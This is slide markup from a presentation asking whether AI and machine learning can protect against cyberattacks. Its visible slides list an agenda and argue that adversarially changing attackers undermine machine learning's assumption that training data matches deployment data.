            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SO...WILL AI &amp; ML PROTECT US?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>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175625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9CF664A5-5490-4425-8156-3F4009090781}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="11858"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1469949"/>
            <a:ext cx="12192000" cy="5388052"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>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22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F90482EA-11AB-45B2-A960-F3D84341E299}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="239383" y="3664749"/>
            <a:ext cx="1894659" cy="371759"/>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Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F459C4C6-1F71-403D-B96F-C44DA1491562}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8373640" y="4496328"/>
            <a:ext cx="1894659" cy="608331"/>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Getting to </a:t>
            </a:r>
          </a:p>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grips</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88DA9458-EAEC-49CA-AA3F-4A72078E7BE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1880864" y="4564862"/>
            <a:ext cx="1894659" cy="608331"/>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Important terms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1A53DCD-F9F0-47C0-97F7-6F7B9F18F70E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6757419" y="3693361"/>
            <a:ext cx="1894659" cy="371759"/>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The future</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE0921E7-76F1-4D13-8341-EB05A67723A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3520771" y="3669527"/>
            <a:ext cx="1894659" cy="608331"/>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The security problem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9958980-F7ED-4E83-BF72-AB1D0F1F0B2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5156265" y="4511996"/>
            <a:ext cx="1894659" cy="253916"/>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A tool, not a solution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75F7928E-6A9E-49B4-8DB1-85C5E02D51C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9996617" y="3712126"/>
            <a:ext cx="2096929" cy="371759"/>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Recommendations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56" name="Picture 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B72BB130-2321-4E6C-9C93-983A320A3DFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
            <a:duotone>
              <a:schemeClr val="accent2">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1943082" y="3940147"/>
            <a:ext cx="1409973" cy="665948"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="57" name="Picture 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6F5D0A1-E809-4096-AC1F-FFD9B82C0DF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:duotone>
              <a:schemeClr val="accent2">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3993648" y="2564053"/>
            <a:ext cx="1948991" cy="1379003"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C00000"/>
          </a:solidFill>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="58" name="Picture 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8347E2B2-6077-4BCC-804C-52AE5CD2AC66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4014906" y="4600917"/>
            <a:ext cx="1884883" cy="1453124"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Callout: Left Arrow 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{600D5B0B-8E60-4367-BDC4-B61D0FA2F59E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3433380" y="3969773"/>
            <a:ext cx="2324929" cy="590878"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrowCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 18415"/>
              <a:gd name="adj2" fmla="val 25000"/>
              <a:gd name="adj3" fmla="val 25000"/>
              <a:gd name="adj4" fmla="val 7292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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The worst place to apply machine learning as it violates basic principle of ML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="60" name="Group 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{002026CB-C7AC-49A1-AD49-B90FBDF98432}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6148305" y="5017137"/>
            <a:ext cx="4108586" cy="620684"/>
            <a:chOff x="813602" y="5648782"/>
            <a:chExt cx="7916716" cy="970679"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="Rectangle 60">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59EA10EF-A539-4CC8-B555-7500BBB244CE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="838200" y="5648782"/>
              <a:ext cx="7892118" cy="970679"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="TextBox 61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87EFCAFC-2599-4C47-8903-8A50840C25A2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="813602" y="5680871"/>
              <a:ext cx="7916714" cy="866389"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" sz="1000" dirty="0">
                  <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>The training data will resemble their real-world deployment target i.e. “Data you are going to work on needs to look the same as the data you trained your ML algorithm on.”</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="63" name="Group 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0695E85B-637C-4BB2-BB0D-8B697C89CA6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2188257" y="2316779"/>
            <a:ext cx="1546699" cy="1268884"/>
            <a:chOff x="826850" y="723923"/>
            <a:chExt cx="1546699" cy="1268884"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="Rectangle 63">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C773D428-6640-4FFF-A6FA-05978F595D64}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="826850" y="723923"/>
              <a:ext cx="1546699" cy="222895"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85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a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Changes Adversarially</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="65" name="Up Arrow Callout 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F699212-7E85-4FDE-89F8-6500D241D587}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133250" y="1078407"/>
              <a:ext cx="914400" cy="914400"/>
            </a:xfrm>
            <a:prstGeom prst="upArrowCallout">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="170144"/>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66" name="TextBox 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38C9F4DA-B5F6-48C8-AA82-7163099AF6E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2609163" y="3605017"/>
            <a:ext cx="779381" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67" name="Picture 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90F38CD9-490B-4AA8-936F-0FC4CB1040E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9"/>
          <a:srcRect b="53459"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2695425" y="3039362"/>
            <a:ext cx="514238" cy="546436"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="TextBox 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AF70BED-6767-42C7-A1AA-9165F8F2670C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2596193" y="5372207"/>
            <a:ext cx="832279" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Defender</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="69" name="Picture 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CD61817-90C0-4284-8D67-E3E6F3CD6736}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId10"/>
          <a:srcRect b="56201"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2676213" y="4781177"/>
            <a:ext cx="638153" cy="546302"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="70" name="Group 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{616EF09E-65CA-4277-A42A-BAC3341DE15A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6419388" y="2304016"/>
            <a:ext cx="1601215" cy="2296901"/>
            <a:chOff x="5057981" y="711160"/>
            <a:chExt cx="1601215" cy="2296901"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="71" name="Rectangle 70">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E6E7FBE-D9BB-4AE6-A7C6-FC8969C2A624}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5057981" y="711160"/>
              <a:ext cx="1601215" cy="520073"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85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a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Does not change adversarially</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="72" name="Up Arrow Callout 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EE47906-CE7C-4F8F-90AE-2DF80B3F000D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5057981" y="1251752"/>
              <a:ext cx="1601215" cy="1756309"/>
            </a:xfrm>
            <a:prstGeom prst="upArrowCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 18925"/>
                <a:gd name="adj2" fmla="val 25000"/>
                <a:gd name="adj3" fmla="val 25000"/>
                <a:gd name="adj4" fmla="val 70000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="170144"/>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73" name="TextBox 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{220620C3-33BF-4B1E-B154-C878C1D1153B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6419388" y="4611867"/>
            <a:ext cx="1601215" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>‘The World’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="74" name="Picture 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EEED91D-FF7A-4784-8C31-14E523AC7E57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId11"/>
          <a:srcRect b="55948"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6465310" y="3440771"/>
            <a:ext cx="486190" cy="514406"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="75" name="Picture 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{220685FC-F027-4379-AC46-7D91B5F937DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId12"/>
          <a:srcRect b="50418"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7515092" y="3440771"/>
            <a:ext cx="468826" cy="514406"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="76" name="Picture 75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADC68486-0914-4685-B582-E24534E20BDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId13"/>
          <a:srcRect b="50000"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7504704" y="4015917"/>
            <a:ext cx="455803" cy="514406"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="77" name="Picture 76">
            <a:extLst>
